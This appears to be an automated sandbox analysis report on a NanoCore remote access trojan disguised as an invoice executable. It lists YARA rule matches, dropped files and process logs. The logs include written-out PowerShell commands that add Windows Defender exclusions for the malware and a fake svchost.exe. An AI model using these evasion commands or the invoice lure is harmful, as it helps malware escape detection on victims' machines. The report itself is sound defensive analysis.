Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.svchost.exe.3da9c08.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.svchost.exe.3da9c08.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.svchost.exe.3d76de8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.svchost.exe.3d76de8.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Executable has a suspicious name (potential lure to open the executable)

Show sources

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Static file information: Suspicious name

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: CN-Invoice-XXXXX9808-19011143287989.exe

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Code function: 0_2_0660DFF0 NtSetInformationThread,

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

File created: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj

Jump to behavior

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Code function: 0_2_01082080
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Code function: 0_2_01082070
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Code function: 0_2_0108CEC0
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Code function: 0_2_0108B27C
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Code function: 0_2_06607350
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Code function: 0_2_065E0040
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Code function: 22_2_050B2070
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Code function: 22_2_050BB27C
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Code function: 26_2_013D2070
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Code function: 26_2_013DEB71
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Code function: 26_2_013DCAEC
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Code function: 26_2_013DEB91
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Code function: 26_2_013DCAE0
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Code function: 26_2_013DB27C

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe

Code function: String function: 0040B550 appears 50 times

Source: CN-Invoice-XXXXX9808-19011143287989.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: svchost.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: CN-Invoice-XXXXX9808-19011143287989.exe	Binary or memory string: OriginalFilename vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.805265607.0000000000702000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameRJFBoOwW.exe2 vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp	Binary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X<>"°&<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAdvancedRun.exe8 vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.844279687.0000000003D0B000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRunPeBraba.dll6 vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.875887622.0000000005950000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.877180450.0000000006140000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameYHjI Bhf.exe2 vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe	Binary or memory string: OriginalFilenameRJFBoOwW.exe2 vs CN-Invoice-XXXXX9808-19011143287989.exe

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 7164, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 7164, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.svchost.exe.3da9c08.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.svchost.exe.3da9c08.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.svchost.exe.3da9c08.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.svchost.exe.3d76de8.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.svchost.exe.3d76de8.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.svchost.exe.3d76de8.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.svchost.exe.3da9c08.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.svchost.exe.3da9c08.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.svchost.exe.3d76de8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.svchost.exe.3d76de8.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: classification engine

Classification label: mal100.troj.evad.winEXE@28/13@3/3

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Code function: 10_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Code function: 11_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe

Code function: 10_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe

Code function: 10_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe

Code function: 10_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CN-Invoice-XXXXX9808-19011143287989.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_01

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

File created: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a

Jump to behavior

Source: unknown	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: CN-Invoice-XXXXX9808-19011143287989.exe	Virustotal: Detection: 28%
Source: CN-Invoice-XXXXX9808-19011143287989.exe	ReversingLabs: Detection: 29%

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

File read: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' -Force
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /SpecialRun 4101d8 5956
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe'
Source: unknown	Process created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe'
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe'
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' -Force
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process created: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /SpecialRun 4101d8 5956
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe'

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Data Obfuscation:

Binary contains a suspicious time stamp

Show sources

Source: initial sample

Static PE information: 0x8AB4D40F [Tue Sep 29 02:29:35 2043 UTC]

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe

Code function: 10_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: CN-Invoice-XXXXX9808-19011143287989.exe	Static PE information: real checksum: 0x1422c should be: 0x3f3d1
Source: svchost.exe.0.dr	Static PE information: real checksum: 0x1422c should be: 0x3f3d1

